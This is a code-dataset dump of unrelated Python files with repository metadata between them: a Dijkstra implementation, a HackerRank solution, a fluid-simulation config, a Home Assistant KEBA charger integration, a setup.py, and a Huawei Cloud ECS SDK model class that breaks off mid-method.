Created on Fri Sep 27 13:08:39 2019
@author: wenbin
"""
"""
this program is the algotithm of dijkstra
注意:本代码的中的节点就是list数组的index,为了和python保持一致,因此下标从0开始,若题目为从1开始,则可将父节点的下标+1
"""
class Dijkstra():
def __init__(self , AdjacencyMatrix , StartVertex):
self.AdjMat = AdjacencyMatrix
self.Vs = StartVertex
print("Dijkstra algotithm start seccessfully , the matrix is:")
print(self.AdjMat)
print("the start vertex is:" , self.Vs )
def DijkstraProcess(self):
"""
this func use Algorithm Dijkstra to deal with the class's data
"""
Msize = len(self.AdjMat) #得到的数据的行数
Vt = [] #已经确定的点的集合
Uvt = [] #还没确定的点的集合
dis = [] #各个点的权重 or 距离
dis_certain = [] #已经确定的各个点的权重
pv = [] #各个点的父节点
for i in range(Msize):
dis.append(float("inf"))
dis_certain.append(float("inf"))
pv.append(None)
dis[self.Vs] = 0
dis[self.Vs] = 0
for i in range(Msize):
MinValue = min(dis)
MinIndex = dis.index(MinValue)
dis_certain[MinIndex] = MinValue
dis[MinIndex] = float("inf")
Vt.append(MinIndex) #将已经确定的点加到Vt中
for j in range(Msize):
if (j != MinIndex and j not in set(Vt)) and self.AdjMat[MinIndex][j] < 1000000000: #判断一下dis[j]是否小于inf
if dis_certain[MinIndex] + self.AdjMat[MinIndex][j] < dis[j]:
dis[j] = dis_certain[MinIndex] + self.AdjMat[MinIndex][j]
pv[j] = MinIndex
print("distance" , dis_certain) #各个节点的最短路,列表中的index就是节点的编号
print("pv" , pv) #各个节点的父节点,从0开始计数
def TestData():
#初始化邻接矩阵
AdjacencyMatrix = [[0, 1, 4 , float("inf"), float("inf")],
[1, 0, float("inf"), 2, float("inf")],
[1, float("inf"), 0, float("inf"), 1],
[float("inf"), 3, float("inf"), 0, 3],
[float("inf"), float("inf"), float("inf"), 2, 0]]
StartVertex = 0 #最短路的起始点
return AdjacencyMatrix , StartVertex
def OR17homework():
#该例子是运筹学书本第10.7题的题目
AdjacencyMatrix = [[0, 2, float("inf") ,8, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"), 0, float("inf"), 6,1, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[1, float("inf"), 0, float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"),float("inf"), 7,0, float("inf"), float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf")],
[float("inf"), float("inf"), float("inf"), 5, 0,float("inf"), float("inf"), float("inf"), 1,float("inf"), float("inf")],
[float("inf"), float("inf"), float("inf"), 1, 3,0,4,float("inf"), float("inf"), float("inf"),float("inf")],
[float("inf"), float("inf"), float("inf"), 2,float("inf"), float("inf"), 0,float("inf"),3,1,float("inf")],
[float("inf"),float("inf"),float("inf"),float("inf"),2,float("inf"),float("inf"),0,float("inf"),float("inf"),9],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),6 , float("inf"),7,0,float("inf"),float("inf")],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),1,0,4],
[float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),float("inf"),2,float("inf"),0]]
StartVertex = 0 #最短路的起始点
return AdjacencyMatrix , StartVertex
if __name__ == "__main__":
# AdjacencyMatrix , StartVertex = TestData()
AdjacencyMatrix , StartVertex = OR17homework()
DijExample = Dijkstra(AdjacencyMatrix , StartVertex)
DijExample.DijkstraProcess()
| 50.777778
| 151
| 0.52565
|
c693cf454d68a6f6c5193c68e4b2ebb6b0a9ddc1
| 328
|
py
|
Python
|
Python/Finding the percentage/Solution.py
|
chessmastersan/HackerRank
|
850319e6f79e7473afbb847d28edde7b2cdfc37d
|
[
"MIT"
] | 2
|
2019-08-07T19:58:20.000Z
|
2019-08-27T00:06:09.000Z
|
Python/Finding the percentage/Solution.py
|
chessmastersan/HackerRank
|
850319e6f79e7473afbb847d28edde7b2cdfc37d
|
[
"MIT"
] | 1
|
2020-06-11T19:09:48.000Z
|
2020-06-11T19:09:48.000Z
|
Python/Finding the percentage/Solution.py
|
chessmastersan/HackerRank
|
850319e6f79e7473afbb847d28edde7b2cdfc37d
|
[
"MIT"
] | 7
|
2019-08-27T00:06:11.000Z
|
2021-12-11T10:01:45.000Z
|
#author SANKALP SAXENA
n = int(input())
marks = []
maxmarks = 0
index = 0
for i in range(0, n):
string = input().split(" ")
marks.append((float(string[1]) + float(string[2]) + float(string[3]))/3)
name = input()
for i in range(0, n):
if name in string:
index = i;
print("%.2f"%marks[index])
| 16.4
| 76
| 0.560976
|
71f915eb02a4207f5a15932865d641d55b8dc9b3
| 1,892
|
py
|
Python
|
docs/hydro_tests/run_kelvin_helmholtz.py
|
henrywatkins/gawain
|
c556be20242249504fc0e04a5d3b7168a8369043
|
[
"MIT"
] | 1
|
2021-11-20T06:16:13.000Z
|
2021-11-20T06:16:13.000Z
|
docs/hydro_tests/run_kelvin_helmholtz.py
|
henrywatkins/gawain
|
c556be20242249504fc0e04a5d3b7168a8369043
|
[
"MIT"
] | null | null | null |
docs/hydro_tests/run_kelvin_helmholtz.py
|
henrywatkins/gawain
|
c556be20242249504fc0e04a5d3b7168a8369043
|
[
"MIT"
] | null | null | null |
"""Kelvin-Helmholtz instability test script
"""
import numpy as np
from gawain.main import run_gawain
run_name = "kelvin_helmholtz"
output_dir = "."
cfl = 0.5
with_mhd = False
t_max = 5.0
# "euler",
integrator = "euler"
# "base", "lax-wendroff", "lax-friedrichs", "hll"
fluxer = "hll"
################ MESH #####################
nx, ny, nz = 256, 256, 1
mesh_shape = (nx, ny, nz)
n_outputs = 100
lx, ly, lz = 1.0, 1.0, 0.001
mesh_size = (lx, ly, lz)
x = np.linspace(-lx / 2.0, lx / 2.0, num=nx)
y = np.linspace(-ly / 2.0, ly / 2.0, num=ny)
z = np.linspace(0.0, lz, num=nz)
X, Y, Z = np.meshgrid(x, y, z, indexing="ij")
############ INITIAL CONDITION #################
adiabatic_idx = 1.4
rho = np.piecewise(Y, [np.absolute(Y) > 0.25, np.absolute(Y) <= 0.25], [1.0, 2.0])
vx = np.piecewise(Y, [np.absolute(Y) > 0.25, np.absolute(Y) <= 0.25], [-0.5, 0.5])
seedx = 0.02 * np.random.rand(*mesh_shape)
vy = 0.02 * np.random.rand(*mesh_shape)
pressure = 2.5 * np.ones(mesh_shape)
mx = rho * vx * (1.0 + seedx)
my = rho * vy
mz = np.zeros(mesh_shape)
e = pressure / (adiabatic_idx - 1.0) + 0.5 * (mx ** 2 + my ** 2 + mz ** 2) / rho
initial_condition = np.array([rho, mx, my, mz, e])
############## BOUNDARY CONDITION ######################
# available types: periodic, fixed
boundary_conditions = ["periodic", "periodic", "periodic"]
############## DO NOT EDIT BELOW ############################
config = {
"run_name": run_name,
"cfl": cfl,
"mesh_shape": mesh_shape,
"mesh_size": mesh_size,
"t_max": t_max,
"n_dumps": n_outputs,
"initial_condition": initial_condition,
"boundary_type": boundary_conditions,
"adi_idx": adiabatic_idx,
"integrator": integrator,
"fluxer": fluxer,
"output_dir": output_dir,
"with_mhd": with_mhd,
}
run_gawain(config)
| 23.949367
| 83
| 0.554968
|
0ef2ce10e562c530cb7f2924e64ba78081e40847
| 313
|
py
|
Python
|
modutec/config/docs.py
|
Momscode-Technologies/modutec
|
4b747283d7d7524ef78747dc06deb0a368838c14
|
[
"MIT"
] | null | null | null |
modutec/config/docs.py
|
Momscode-Technologies/modutec
|
4b747283d7d7524ef78747dc06deb0a368838c14
|
[
"MIT"
] | null | null | null |
modutec/config/docs.py
|
Momscode-Technologies/modutec
|
4b747283d7d7524ef78747dc06deb0a368838c14
|
[
"MIT"
] | null | null | null |
"""
Configuration for docs
"""
# source_link = "https://github.com/[org_name]/modutec"
# docs_base_url = "https://[org_name].github.io/modutec"
# headline = "App that does everything"
# sub_heading = "Yes, you got that right the first time, everything"
def get_context(context):
context.brand_html = "Modutec"
| 26.083333
| 68
| 0.722045
|
172c38eb796a1b2dd83e2e62803c0038d2c0e2d5
| 8,041
|
py
|
Python
|
custom_components/keba/__init__.py
|
dannerph/homeassistant-keba
|
1b8cae2efabb80dab940306fe303e33e84fafd10
|
[
"Apache-2.0"
] | 3
|
2022-01-13T22:31:55.000Z
|
2022-02-17T19:02:27.000Z
|
custom_components/keba/__init__.py
|
dannerph/homeassistant-keba
|
1b8cae2efabb80dab940306fe303e33e84fafd10
|
[
"Apache-2.0"
] | 4
|
2022-01-15T12:29:29.000Z
|
2022-01-16T14:30:40.000Z
|
custom_components/keba/__init__.py
|
dannerph/homeassistant-keba
|
1b8cae2efabb80dab940306fe303e33e84fafd10
|
[
"Apache-2.0"
] | null | null | null |
"""Support for KEBA charging stations."""
from __future__ import annotations
import logging
from keba_kecontact.connection import KebaKeContact, SetupError
from keba_kecontact.wallbox import Wallbox
from homeassistant.components.notify import DOMAIN as NOTIFY_DOMAIN
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from homeassistant.const import CONF_DEVICE_ID, CONF_HOST, CONF_NAME, Platform
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers import device_registry, discovery
from homeassistant.helpers.entity import DeviceInfo, Entity, EntityDescription
from homeassistant.helpers.typing import ConfigType
from homeassistant.util import slugify
from .const import (
CONF_FS,
CONF_FS_FALLBACK,
CONF_FS_PERSIST,
CONF_FS_TIMEOUT,
CONF_RFID,
CONF_RFID_CLASS,
DATA_HASS_CONFIG,
DOMAIN,
KEBA_CONNECTION,
WALLBOXES,
)
_LOGGER = logging.getLogger(__name__)
PLATFORMS = [
Platform.BINARY_SENSOR,
Platform.LOCK,
Platform.BUTTON,
Platform.NOTIFY,
Platform.SENSOR,
Platform.NUMBER,
]
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the KEBA charging station component from configuration.yaml."""
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][DATA_HASS_CONFIG] = config
if DOMAIN in config:
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_IMPORT}, data=config[DOMAIN]
)
)
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up KEBA charging station from a config entry."""
keba = await setup_keba_connection(hass)
try:
wallbox = await keba.setup_wallbox(entry.data[CONF_HOST])
except SetupError as exc:
raise ConfigEntryNotReady(f"{entry.data[CONF_HOST]} not reachable") from exc
hass.data[DOMAIN][WALLBOXES][entry.entry_id] = wallbox
# Set failsafe mode at start up of Home Assistant
try:
fs_timeout = entry.options[CONF_FS_TIMEOUT] if entry.options[CONF_FS] else 0
fs_fallback = entry.options[CONF_FS_FALLBACK]
fs_persist = entry.options[CONF_FS_PERSIST]
hass.loop.create_task(wallbox.set_failsafe(fs_timeout, fs_fallback, fs_persist))
except KeyError:
_LOGGER.debug(
"Options for charging station %s not available", wallbox.device_info.model
)
except ValueError as ex:
_LOGGER.warning("Could not set failsafe mode %s", ex)
# Add update listener for config entry changes (options)
entry.async_on_unload(entry.add_update_listener(update_listener))
# Register services to hass
async def execute_service(call: ServiceCall) -> None:
"""Execute a service for a wallbox."""
device_id: str | None = str(call.data.get(CONF_DEVICE_ID))
wallbox: Wallbox | None = None
# from device_id to wallbox
if not (device := device_registry.async_get(hass).async_get(device_id)):
_LOGGER.error("Could not find a device for id: %s", device_id)
return
config_entry = hass.config_entries.async_get_entry(
next(iter(device.config_entries))
)
host = config_entry.data[CONF_HOST]
if not (wallbox := keba.get_wallbox(host)):
_LOGGER.error("Could not find a charging station with host %s", host)
return
function_call = getattr(wallbox, call.service)
additional_args = {}
if call.service in ["start", "stop"]:
if (
CONF_RFID not in call.data
and CONF_RFID in entry.options
and entry.options[CONF_RFID] != ""
):
additional_args[CONF_RFID] = entry.options[CONF_RFID]
if (
CONF_RFID_CLASS not in call.data
and CONF_RFID_CLASS in entry.options
and entry.options[CONF_RFID_CLASS] != ""
):
additional_args[CONF_RFID_CLASS] = entry.options[CONF_RFID_CLASS]
await function_call(**call.data, **additional_args)
for service in wallbox.device_info.available_services():
if service == "display":
# set up notify platform, no entry support for notify platform yet,
# have to use discovery to load platform.
hass.async_create_task(
discovery.async_load_platform(
hass,
NOTIFY_DOMAIN,
DOMAIN,
{CONF_NAME: DOMAIN},
hass.data[DOMAIN][DATA_HASS_CONFIG],
)
)
else:
hass.services.async_register(DOMAIN, service, execute_service)
# Load platforms
hass.config_entries.async_setup_platforms(
entry, [platform for platform in PLATFORMS if platform != Platform.NOTIFY]
)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
keba = hass.data[DOMAIN][KEBA_CONNECTION]
unload_ok = await hass.config_entries.async_unload_platforms(
entry, [platform for platform in PLATFORMS if platform != Platform.NOTIFY]
)
# Remove notify
wallbox = keba.get_wallbox(entry.data[CONF_HOST])
if "display" in wallbox.device_info.available_services():
hass.services.async_remove(
NOTIFY_DOMAIN, f"{DOMAIN}_{slugify(wallbox.device_info.model)}"
)
# Only remove services if it is the last wallbox
if len(hass.data[DOMAIN][WALLBOXES]) == 1:
_LOGGER.debug("Removing last charging station, cleanup services and notify")
for service in wallbox.device_info.available_services():
if service == "display":
hass.services.async_remove(NOTIFY_DOMAIN, DOMAIN)
else:
hass.services.async_remove(DOMAIN, service)
if unload_ok:
keba.remove_wallbox(entry.data[CONF_HOST])
hass.data[DOMAIN][WALLBOXES].pop(entry.entry_id)
return unload_ok
async def update_listener(hass: HomeAssistant, config_entry: ConfigEntry) -> None:
"""Handle options update."""
await hass.config_entries.async_reload(config_entry.entry_id)
async def setup_keba_connection(hass: HomeAssistant) -> KebaKeContact:
"""Set up internal keba connection (ensure same keba connection instance)."""
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN].setdefault(WALLBOXES, {})
if KEBA_CONNECTION not in hass.data[DOMAIN]:
hass.data[DOMAIN][KEBA_CONNECTION] = KebaKeContact(hass.loop)
return hass.data[DOMAIN][KEBA_CONNECTION]
class KebaBaseEntity(Entity):
"""Common base for Keba Wallbox entities."""
_attr_should_poll = False
def __init__(
self,
wallbox: Wallbox,
description: EntityDescription,
) -> None:
"""Initialize sensor."""
self._wallbox = wallbox
self.entity_description = description
wb_info = self._wallbox.device_info
self._attr_name = f"{wb_info.manufacturer} {wb_info.model} {description.name}"
self._attr_unique_id = f"{DOMAIN}-{wb_info.device_id}-{description.key}"
self._attr_device_info = DeviceInfo(
identifiers={(DOMAIN, wb_info.device_id)},
manufacturer=wb_info.manufacturer,
model=wb_info.model,
name=f"{wb_info.manufacturer} {wb_info.model}",
sw_version=wb_info.sw_version,
configuration_url=wb_info.webconfigurl,
)
def update_callback(self, wallbox: Wallbox, data) -> None:
"""Schedule a state update."""
self.schedule_update_ha_state(True)
async def async_added_to_hass(self) -> None:
"""Add callback after being added to hass.
Show latest data after startup.
"""
self._wallbox.add_callback(self.update_callback)
| 34.659483
| 88
| 0.667703
|
f3aad57b78e6490e3cdf0f8b22cd5dfda5cccae3
| 2,245
|
py
|
Python
|
setup.py
|
bliptrip/python-fooster-cron
|
a7d818023f693ad4d614826ebb88d25bcc055b6d
|
[
"MIT"
] | null | null | null |
setup.py
|
bliptrip/python-fooster-cron
|
a7d818023f693ad4d614826ebb88d25bcc055b6d
|
[
"MIT"
] | null | null | null |
setup.py
|
bliptrip/python-fooster-cron
|
a7d818023f693ad4d614826ebb88d25bcc055b6d
|
[
"MIT"
] | 1
|
2021-02-24T15:34:12.000Z
|
2021-02-24T15:34:12.000Z
|
#!/usr/bin/env python3
import os
import re
from setuptools import setup, find_packages
version = None
def find(haystack, *needles):
regexes = [(index, re.compile(r'^{}\s*=\s*[\'"]([^\'"]*)[\'"]$'.format(needle))) for index, needle in enumerate(needles)]
values = ['' for needle in needles]
for line in haystack:
if len(regexes) == 0:
break
for rindex, (vindex, regex) in enumerate(regexes):
match = regex.match(line)
if match:
values[vindex] = match.groups()[0]
del regexes[rindex]
break
if len(needles) == 1:
return values[0]
else:
return values
with open(os.path.join(os.path.dirname(__file__), 'fooster', 'cron', '__init__.py'), 'r') as cron:
version = find(cron, '__version__')
with open(os.path.join(os.path.dirname(__file__), 'README.md'), 'r') as rfile:
readme = rfile.read()
setup(
name='fooster-cron',
version=version,
description='a small cron-like scheduler in Python',
long_description=readme,
long_description_content_type='text/markdown',
license='MIT',
url='https://github.com/lilyinstarlight/python-fooster-cron',
author='Lily Foster',
author_email='lily@lily.flowers',
packages=find_packages(),
namespace_packages=['fooster'],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Environment :: No Input/Output (Daemon)',
'Intended Audience :: Developers',
'License :: Freely Distributable',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Libraries',
],
)
| 30.753425
| 125
| 0.6
|
9d60a3f07aa515baaee669fd9255d8f3b73c4244
| 23,153
|
py
|
Python
|
huaweicloud-sdk-ecs/huaweicloudsdkecs/v2/model/pre_paid_server.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 1
|
2021-04-16T07:59:28.000Z
|
2021-04-16T07:59:28.000Z
|
huaweicloud-sdk-ecs/huaweicloudsdkecs/v2/model/pre_paid_server.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | null | null | null |
huaweicloud-sdk-ecs/huaweicloudsdkecs/v2/model/pre_paid_server.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 1
|
2022-01-17T02:24:18.000Z
|
2022-01-17T02:24:18.000Z
|
# coding: utf-8
import pprint
import re
import six
class PrePaidServer:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'auto_terminate_time': 'str',
'image_ref': 'str',
'flavor_ref': 'str',
'name': 'str',
'user_data': 'str',
'admin_pass': 'str',
'key_name': 'str',
'vpcid': 'str',
'nics': 'list[PrePaidServerNic]',
'publicip': 'PrePaidServerPublicip',
'count': 'int',
'is_auto_rename': 'bool',
'root_volume': 'PrePaidServerRootVolume',
'data_volumes': 'list[PrePaidServerDataVolume]',
'security_groups': 'list[PrePaidServerSecurityGroup]',
'availability_zone': 'str',
'extendparam': 'PrePaidServerExtendParam',
'metadata': 'dict(str, str)',
'osscheduler_hints': 'PrePaidServerSchedulerHints',
'tags': 'list[str]',
'server_tags': 'list[PrePaidServerTag]',
'description': 'str'
}
attribute_map = {
'auto_terminate_time': 'auto_terminate_time',
'image_ref': 'imageRef',
'flavor_ref': 'flavorRef',
'name': 'name',
'user_data': 'user_data',
'admin_pass': 'adminPass',
'key_name': 'key_name',
'vpcid': 'vpcid',
'nics': 'nics',
'publicip': 'publicip',
'count': 'count',
'is_auto_rename': 'isAutoRename',
'root_volume': 'root_volume',
'data_volumes': 'data_volumes',
'security_groups': 'security_groups',
'availability_zone': 'availability_zone',
'extendparam': 'extendparam',
'metadata': 'metadata',
'osscheduler_hints': 'os:scheduler_hints',
'tags': 'tags',
'server_tags': 'server_tags',
'description': 'description'
}
def __init__(self, auto_terminate_time=None, image_ref=None, flavor_ref=None, name=None, user_data=None, admin_pass=None, key_name=None, vpcid=None, nics=None, publicip=None, count=None, is_auto_rename=None, root_volume=None, data_volumes=None, security_groups=None, availability_zone=None, extendparam=None, metadata=None, osscheduler_hints=None, tags=None, server_tags=None, description=None):
"""PrePaidServer - a model defined in huaweicloud sdk"""
self._auto_terminate_time = None
self._image_ref = None
self._flavor_ref = None
self._name = None
self._user_data = None
self._admin_pass = None
self._key_name = None
self._vpcid = None
self._nics = None
self._publicip = None
self._count = None
self._is_auto_rename = None
self._root_volume = None
self._data_volumes = None
self._security_groups = None
self._availability_zone = None
self._extendparam = None
self._metadata = None
self._osscheduler_hints = None
self._tags = None
self._server_tags = None
self._description = None
self.discriminator = None
if auto_terminate_time is not None:
self.auto_terminate_time = auto_terminate_time
self.image_ref = image_ref
self.flavor_ref = flavor_ref
self.name = name
if user_data is not None:
self.user_data = user_data
if admin_pass is not None:
self.admin_pass = admin_pass
if key_name is not None:
self.key_name = key_name
self.vpcid = vpcid
self.nics = nics
if publicip is not None:
self.publicip = publicip
if count is not None:
self.count = count
if is_auto_rename is not None:
self.is_auto_rename = is_auto_rename
self.root_volume = root_volume
if data_volumes is not None:
self.data_volumes = data_volumes
if security_groups is not None:
self.security_groups = security_groups
self.availability_zone = availability_zone
if extendparam is not None:
self.extendparam = extendparam
if metadata is not None:
self.metadata = metadata
if osscheduler_hints is not None:
self.osscheduler_hints = osscheduler_hints
if tags is not None:
self.tags = tags
if server_tags is not None:
self.server_tags = server_tags
if description is not None:
self.description = description
@property
def auto_terminate_time(self):
"""Gets the auto_terminate_time of this PrePaidServer.
弹性云服务器自动释放时间。 时间格式例如:2020-01-19T03:30:52Z
:return: The auto_terminate_time of this PrePaidServer.
:rtype: str
"""
return self._auto_terminate_time
@auto_terminate_time.setter
def auto_terminate_time(self, auto_terminate_time):
"""Sets the auto_terminate_time of this PrePaidServer.
弹性云服务器自动释放时间。 时间格式例如:2020-01-19T03:30:52Z
:param auto_terminate_time: The auto_terminate_time of this PrePaidServer.
:type: str
"""
self._auto_terminate_time = auto_terminate_time
@property
def image_ref(self):
"""Gets the image_ref of this PrePaidServer.
待创建云服务器的系统镜像,需要指定已创建镜像的ID,ID格式为通用唯一识别码(Universally Unique Identifier,简称UUID)。
:return: The image_ref of this PrePaidServer.
:rtype: str
"""
return self._image_ref
@image_ref.setter
def image_ref(self, image_ref):
"""Sets the image_ref of this PrePaidServer.
待创建云服务器的系统镜像,需要指定已创建镜像的ID,ID格式为通用唯一识别码(Universally Unique Identifier,简称UUID)。
:param image_ref: The image_ref of this PrePaidServer.
:type: str
"""
self._image_ref = image_ref
@property
def flavor_ref(self):
"""Gets the flavor_ref of this PrePaidServer.
待创建云服务器的系统规格的ID。 已上线的规格请参见《[弹性云服务器产品介绍](https://support.huaweicloud.com/ecs/index.html)》的“实例类型与规格”章节。
:return: The flavor_ref of this PrePaidServer.
:rtype: str
"""
return self._flavor_ref
@flavor_ref.setter
def flavor_ref(self, flavor_ref):
"""Sets the flavor_ref of this PrePaidServer.
待创建云服务器的系统规格的ID。 已上线的规格请参见《[弹性云服务器产品介绍](https://support.huaweicloud.com/ecs/index.html)》的“实例类型与规格”章节。
:param flavor_ref: The flavor_ref of this PrePaidServer.
:type: str
"""
self._flavor_ref = flavor_ref
@property
def name(self):
"""Gets the name of this PrePaidServer.
云服务器名称。 取值范围: - 只能由中文字符、英文字母、数字及“_”、“-”、“.”组成,且长度为[1-64]个字符。 - 创建的云服务器器数量(count字段对应的值)大于1时,为区分不同云服务器,创建过程中系统会自动在名称后加“-0000”的类似标记。故此时名称的长度为[1-59]个字符。 > 说明: > > 云服务器虚拟机内部(hostname)命名规则遵循 RFC 952和RFC 1123命名规范,建议使用a-zA-z或0-9以及中划线\"-\"组成的名称命名,\"_\"将在弹性云服务器内部默认转化为\"-\"。
:return: The name of this PrePaidServer.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this PrePaidServer.
云服务器名称。 取值范围: - 只能由中文字符、英文字母、数字及“_”、“-”、“.”组成,且长度为[1-64]个字符。 - 创建的云服务器器数量(count字段对应的值)大于1时,为区分不同云服务器,创建过程中系统会自动在名称后加“-0000”的类似标记。故此时名称的长度为[1-59]个字符。 > 说明: > > 云服务器虚拟机内部(hostname)命名规则遵循 RFC 952和RFC 1123命名规范,建议使用a-zA-z或0-9以及中划线\"-\"组成的名称命名,\"_\"将在弹性云服务器内部默认转化为\"-\"。
:param name: The name of this PrePaidServer.
:type: str
"""
self._name = name
@property
def user_data(self):
"""Gets the user_data of this PrePaidServer.
创建云服务器过程中待注入用户数据。支持注入文本、文本文件或gzip文件。 更多关于待注入用户数据的信息,请参见《弹性云服务器用户指南 》的“用户数据注入”章节。 约束: - 注入内容,需要进行base64格式编码。注入内容(编码之前的内容)最大长度32KB。 - 创建密码方式鉴权的Linux弹性云服务器时,该字段可为root用户注入自定义初始化密码,具体注入密码的使用方法请参见背景信息(设置登录鉴权方式)。 示例(base64编码前): - Linux弹性云服务器 ``` #! /bin/bash echo user_test >> /home/user.txt ``` - Windows弹性云服务器 ``` rem cmd echo 111 > c:\\aaa.tx ```
:return: The user_data of this PrePaidServer.
:rtype: str
"""
return self._user_data
@user_data.setter
def user_data(self, user_data):
"""Sets the user_data of this PrePaidServer.
创建云服务器过程中待注入用户数据。支持注入文本、文本文件或gzip文件。 更多关于待注入用户数据的信息,请参见《弹性云服务器用户指南 》的“用户数据注入”章节。 约束: - 注入内容,需要进行base64格式编码。注入内容(编码之前的内容)最大长度32KB。 - 创建密码方式鉴权的Linux弹性云服务器时,该字段可为root用户注入自定义初始化密码,具体注入密码的使用方法请参见背景信息(设置登录鉴权方式)。 示例(base64编码前): - Linux弹性云服务器 ``` #! /bin/bash echo user_test >> /home/user.txt ``` - Windows弹性云服务器 ``` rem cmd echo 111 > c:\\aaa.tx ```
:param user_data: The user_data of this PrePaidServer.
:type: str
"""
self._user_data = user_data
@property
def admin_pass(self):
"""Gets the admin_pass of this PrePaidServer.
如果需要使用密码方式登录云服务器,可使用adminPass字段指定云服务器管理员帐户初始登录密码。其中,Linux管理员帐户为root,Windows管理员帐户为Administrator。具体使用方法请参见背景信息(设置登录鉴权方式)。 密码复杂度要求: - 长度为8-26位。 - 密码至少必须包含大写字母、小写字母、数字和特殊字符(!@$%^-_=+[{}]:,./?)中的三种。 - 密码不能包含用户名或用户名的逆序。 - Windows系统密码不能包含用户名或用户名的逆序,不能包含用户名中超过两个连续字符的部分。
:return: The admin_pass of this PrePaidServer.
:rtype: str
"""
return self._admin_pass
@admin_pass.setter
def admin_pass(self, admin_pass):
"""Sets the admin_pass of this PrePaidServer.
如果需要使用密码方式登录云服务器,可使用adminPass字段指定云服务器管理员帐户初始登录密码。其中,Linux管理员帐户为root,Windows管理员帐户为Administrator。具体使用方法请参见背景信息(设置登录鉴权方式)。 密码复杂度要求: - 长度为8-26位。 - 密码至少必须包含大写字母、小写字母、数字和特殊字符(!@$%^-_=+[{}]:,./?)中的三种。 - 密码不能包含用户名或用户名的逆序。 - Windows系统密码不能包含用户名或用户名的逆序,不能包含用户名中超过两个连续字符的部分。
:param admin_pass: The admin_pass of this PrePaidServer.
:type: str
"""
self._admin_pass = admin_pass
@property
def key_name(self):
"""Gets the key_name of this PrePaidServer.
如果需要使用SSH密钥方式登录云服务器,请指定已创建密钥的名称。 密钥可以通过密钥创建接口进行创建 [创建和导入SSH密钥](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0020212678.html)(请参见),或使用SSH密钥查询接口查询已有的密钥(请参见[查询SSH密钥列表](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0020212676.html) )。
:return: The key_name of this PrePaidServer.
:rtype: str
"""
return self._key_name
@key_name.setter
def key_name(self, key_name):
"""Sets the key_name of this PrePaidServer.
如果需要使用SSH密钥方式登录云服务器,请指定已创建密钥的名称。 密钥可以通过密钥创建接口进行创建 [创建和导入SSH密钥](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0020212678.html)(请参见),或使用SSH密钥查询接口查询已有的密钥(请参见[查询SSH密钥列表](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0020212676.html) )。
:param key_name: The key_name of this PrePaidServer.
:type: str
"""
self._key_name = key_name
@property
def vpcid(self):
"""Gets the vpcid of this PrePaidServer.
待创建云服务器所属虚拟私有云(简称VPC),需要指定已创建VPC的ID,UUID格式。
:return: The vpcid of this PrePaidServer.
:rtype: str
"""
return self._vpcid
@vpcid.setter
def vpcid(self, vpcid):
"""Sets the vpcid of this PrePaidServer.
待创建云服务器所属虚拟私有云(简称VPC),需要指定已创建VPC的ID,UUID格式。
:param vpcid: The vpcid of this PrePaidServer.
:type: str
"""
self._vpcid = vpcid
@property
def nics(self):
"""Gets the nics of this PrePaidServer.
待创建云服务器的网卡信息。 约束: - 网卡对应的子网(subnet)必须属于vpcid对应的VPC。 - 当前单个云服务器支持最多挂载12张网卡。
:return: The nics of this PrePaidServer.
:rtype: list[PrePaidServerNic]
"""
return self._nics
@nics.setter
def nics(self, nics):
"""Sets the nics of this PrePaidServer.
待创建云服务器的网卡信息。 约束: - 网卡对应的子网(subnet)必须属于vpcid对应的VPC。 - 当前单个云服务器支持最多挂载12张网卡。
:param nics: The nics of this PrePaidServer.
:type: list[PrePaidServerNic]
"""
self._nics = nics
@property
def publicip(self):
"""Gets the publicip of this PrePaidServer.
:return: The publicip of this PrePaidServer.
:rtype: PrePaidServerPublicip
"""
return self._publicip
@publicip.setter
def publicip(self, publicip):
"""Sets the publicip of this PrePaidServer.
:param publicip: The publicip of this PrePaidServer.
:type: PrePaidServerPublicip
"""
self._publicip = publicip
@property
def count(self):
"""Gets the count of this PrePaidServer.
创建云服务器数量。 约束: - 不传该字段时默认取值为1。 - 租户的配额足够时,最大值为500。
:return: The count of this PrePaidServer.
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
